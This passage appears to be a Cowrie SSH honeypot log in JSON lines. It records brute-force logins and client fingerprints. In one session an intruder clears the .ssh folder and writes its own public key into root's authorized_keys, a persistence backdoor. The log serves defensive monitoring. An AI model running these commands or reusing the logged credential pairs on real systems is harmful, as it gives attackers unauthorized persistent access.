{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:22:17.798712Z","src_ip":"72.240.125.133","session":"d40ef14d4053"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:22:17.926712Z","src_ip":"72.240.125.133","session":"d40ef14d4053"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T00:22:18.417536Z","src_ip":"72.240.125.133","session":"d40ef14d4053"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:22:19.539587Z","src_ip":"72.240.125.133","session":"d40ef14d4053"}
{"eventid":"cowrie.session.connect","src_ip":"72.240.125.133","src_port":40768,"dst_ip":"1.2.3.4","dst_port":22,"session":"df5fe214759d","protocol":"ssh","message":"New connection: 72.240.125.133:40768 (1.2.3.4:22) [session: df5fe214759d]","sensor":"my-vps","timestamp":"2025-08-26T00:22:19.667014Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:22:19.667766Z","src_ip":"72.240.125.133","session":"df5fe214759d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:22:19.794975Z","src_ip":"72.240.125.133","session":"df5fe214759d"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:22:20.334041Z","src_ip":"72.240.125.133","session":"df5fe214759d"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:22:20.462896Z","src_ip":"72.240.125.133","session":"cc101624852f"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:22:20.464034Z","src_ip":"72.240.125.133","session":"df5fe214759d"}
{"eventid":"cowrie.session.connect","src_ip":"139.19.117.131","src_port":35536,"dst_ip":"1.2.3.4","dst_port":22,"session":"4ecd89ecab8b","protocol":"ssh","message":"New connection: 139.19.117.131:35536 (1.2.3.4:22) [session: 4ecd89ecab8b]","sensor":"my-vps","timestamp":"2025-08-26T00:22:21.413934Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T00:22:21.414798Z","src_ip":"139.19.117.131","session":"4ecd89ecab8b"}
{"eventid":"cowrie.client.kex","hassh":"f1e5e9d24e5e345e8745613bde22d532","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f1e5e9d24e5e345e8745613bde22d532","sensor":"my-vps","timestamp":"2025-08-26T00:22:21.431673Z","src_ip":"139.19.117.131","session":"4ecd89ecab8b"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"ed:f4:28:10:b0:5b:9a:3e:fc:8d:08:f8:6d:21:90:97","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDa6AGNB9JlprameL4owv03Gnrf9iKoeaytF+cW0QFILXNM7tg8B8FTLk94pQVqrRMPy6/Bu7RKEKssoV5bNzxpQ1hnSF+plOGIV2fe78WwLyz2KjGeLPltUMaTSqtckvmGXQwKek310ZqMlNEVpsYl5yK14AGKArj2chHdsltxsQV/4du4X0PK6OHUPiIm3hNBq0K+A6eA2zinUl5FOGcMxG+X8kc0CtRsiLl0lXjrayYJGmU+U9afU0SHNdzoh/QhNA4vmIvkwcTiC9BkuyXi8Mkfv2wtm8FVjyqmMqpw7wgSrbjOTPDzgz5YoVHSyYS3z/UGFTgh0gtBvCQ4yx57TabXIbQBK2K0EOXBnEMz6eZSd8zgA2lqlsj5grMM8ny1HBH4XEb++W6TdsLmFFvSx+G/WhtJrClXtUqZPp5PbXa8xKFMh5/Jhc/aggNelI3CrBAu7QCI4hJhxTRZ0JCGnOATqgnNkSnK71sfvHLAQdJoWGB2FKtRMzeDSIzgdXM=","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint ed:f4:28:10:b0:5b:9a:3e:fc:8d:08:f8:6d:21:90:97","sensor":"my-vps","timestamp":"2025-08-26T00:22:21.472122Z","src_ip":"139.19.117.131","session":"4ecd89ecab8b"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"ed:f4:28:10:b0:5b:9a:3e:fc:8d:08:f8:6d:21:90:97","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDa6AGNB9JlprameL4owv03Gnrf9iKoeaytF+cW0QFILXNM7tg8B8FTLk94pQVqrRMPy6/Bu7RKEKssoV5bNzxpQ1hnSF+plOGIV2fe78WwLyz2KjGeLPltUMaTSqtckvmGXQwKek310ZqMlNEVpsYl5yK14AGKArj2chHdsltxsQV/4du4X0PK6OHUPiIm3hNBq0K+A6eA2zinUl5FOGcMxG+X8kc0CtRsiLl0lXjrayYJGmU+U9afU0SHNdzoh/QhNA4vmIvkwcTiC9BkuyXi8Mkfv2wtm8FVjyqmMqpw7wgSrbjOTPDzgz5YoVHSyYS3z/UGFTgh0gtBvCQ4yx57TabXIbQBK2K0EOXBnEMz6eZSd8zgA2lqlsj5grMM8ny1HBH4XEb++W6TdsLmFFvSx+G/WhtJrClXtUqZPp5PbXa8xKFMh5/Jhc/aggNelI3CrBAu7QCI4hJhxTRZ0JCGnOATqgnNkSnK71sfvHLAQdJoWGB2FKtRMzeDSIzgdXM=","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-26T00:22:21.472768Z","src_ip":"139.19.117.131","session":"4ecd89ecab8b"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"ed:f4:28:10:b0:5b:9a:3e:fc:8d:08:f8:6d:21:90:97","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDa6AGNB9JlprameL4owv03Gnrf9iKoeaytF+cW0QFILXNM7tg8B8FTLk94pQVqrRMPy6/Bu7RKEKssoV5bNzxpQ1hnSF+plOGIV2fe78WwLyz2KjGeLPltUMaTSqtckvmGXQwKek310ZqMlNEVpsYl5yK14AGKArj2chHdsltxsQV/4du4X0PK6OHUPiIm3hNBq0K+A6eA2zinUl5FOGcMxG+X8kc0CtRsiLl0lXjrayYJGmU+U9afU0SHNdzoh/QhNA4vmIvkwcTiC9BkuyXi8Mkfv2wtm8FVjyqmMqpw7wgSrbjOTPDzgz5YoVHSyYS3z/UGFTgh0gtBvCQ4yx57TabXIbQBK2K0EOXBnEMz6eZSd8zgA2lqlsj5grMM8ny1HBH4XEb++W6TdsLmFFvSx+G/WhtJrClXtUqZPp5PbXa8xKFMh5/Jhc/aggNelI3CrBAu7QCI4hJhxTRZ0JCGnOATqgnNkSnK71sfvHLAQdJoWGB2FKtRMzeDSIzgdXM=","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint ed:f4:28:10:b0:5b:9a:3e:fc:8d:08:f8:6d:21:90:97","sensor":"my-vps","timestamp":"2025-08-26T00:22:21.490206Z","src_ip":"139.19.117.131","session":"4ecd89ecab8b"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"ed:f4:28:10:b0:5b:9a:3e:fc:8d:08:f8:6d:21:90:97","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDa6AGNB9JlprameL4owv03Gnrf9iKoeaytF+cW0QFILXNM7tg8B8FTLk94pQVqrRMPy6/Bu7RKEKssoV5bNzxpQ1hnSF+plOGIV2fe78WwLyz2KjGeLPltUMaTSqtckvmGXQwKek310ZqMlNEVpsYl5yK14AGKArj2chHdsltxsQV/4du4X0PK6OHUPiIm3hNBq0K+A6eA2zinUl5FOGcMxG+X8kc0CtRsiLl0lXjrayYJGmU+U9afU0SHNdzoh/QhNA4vmIvkwcTiC9BkuyXi8Mkfv2wtm8FVjyqmMqpw7wgSrbjOTPDzgz5YoVHSyYS3z/UGFTgh0gtBvCQ4yx57TabXIbQBK2K0EOXBnEMz6eZSd8zgA2lqlsj5grMM8ny1HBH4XEb++W6TdsLmFFvSx+G/WhtJrClXtUqZPp5PbXa8xKFMh5/Jhc/aggNelI3CrBAu7QCI4hJhxTRZ0JCGnOATqgnNkSnK71sfvHLAQdJoWGB2FKtRMzeDSIzgdXM=","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-26T00:22:21.490821Z","src_ip":"139.19.117.131","session":"4ecd89ecab8b"}
{"eventid":"cowrie.session.connect","src_ip":"45.159.112.103","src_port":57158,"dst_ip":"1.2.3.4","dst_port":22,"session":"697bebf54e17","protocol":"ssh","message":"New connection: 45.159.112.103:57158 (1.2.3.4:22) [session: 697bebf54e17]","sensor":"my-vps","timestamp":"2025-08-26T00:22:29.368190Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:22:29.368948Z","src_ip":"45.159.112.103","session":"697bebf54e17"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:22:29.476851Z","src_ip":"45.159.112.103","session":"697bebf54e17"}
{"eventid":"cowrie.login.failed","username":"xyh","password":"xyh","message":"login attempt [xyh/xyh] failed","sensor":"my-vps","timestamp":"2025-08-26T00:22:29.949561Z","src_ip":"45.159.112.103","session":"697bebf54e17"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:22:31.060470Z","src_ip":"45.159.112.103","session":"697bebf54e17"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:22:31.414060Z","src_ip":"139.19.117.131","session":"4ecd89ecab8b"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.245","src_port":57068,"dst_ip":"1.2.3.4","dst_port":22,"session":"882fbaa3e53a","protocol":"ssh","message":"New connection: 27.112.78.245:57068 (1.2.3.4:22) [session: 882fbaa3e53a]","sensor":"my-vps","timestamp":"2025-08-26T00:22:35.801354Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:22:35.841597Z","src_ip":"27.112.78.245","session":"882fbaa3e53a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:22:36.100600Z","src_ip":"27.112.78.245","session":"882fbaa3e53a"}
{"eventid":"cowrie.login.success","username":"root","password":"Rr@123456","message":"login attempt [root/Rr@123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:22:37.145526Z","src_ip":"27.112.78.245","session":"882fbaa3e53a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:22:37.714067Z","src_ip":"27.112.78.245","session":"882fbaa3e53a"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:22:37.714887Z","src_ip":"27.112.78.245","session":"882fbaa3e53a"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:22:37.715883Z","src_ip":"27.112.78.245","session":"882fbaa3e53a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:22:37.978073Z","src_ip":"27.112.78.245","session":"882fbaa3e53a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:22:39.116162Z","src_ip":"27.112.78.245","session":"882fbaa3e53a"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T00:22:39.116853Z","src_ip":"27.112.78.245","session":"882fbaa3e53a"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T00:22:39.378971Z","src_ip":"27.112.78.245","session":"882fbaa3e53a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:22:39.379891Z","src_ip":"27.112.78.245","session":"882fbaa3e53a"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.245","src_port":57074,"dst_ip":"1.2.3.4","dst_port":22,"session":"a1c119af46a7","protocol":"ssh","message":"New connection: 27.112.78.245:57074 (1.2.3.4:22) [session: a1c119af46a7]","sensor":"my-vps","timestamp":"2025-08-26T00:22:39.636242Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:22:39.636980Z","src_ip":"27.112.78.245","session":"a1c119af46a7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:22:39.896095Z","src_ip":"27.112.78.245","session":"a1c119af46a7"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T00:22:40.975943Z","src_ip":"27.112.78.245","session":"a1c119af46a7"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:22:42.246471Z","src_ip":"27.112.78.245","session":"a1c119af46a7"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.245","src_port":57088,"dst_ip":"1.2.3.4","dst_port":22,"session":"958ebfe6a91f","protocol":"ssh","message":"New connection: 27.112.78.245:57088 (1.2.3.4:22) [session: 958ebfe6a91f]","sensor":"my-vps","timestamp":"2025-08-26T00:22:42.513621Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:22:42.514346Z","src_ip":"27.112.78.245","session":"958ebfe6a91f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.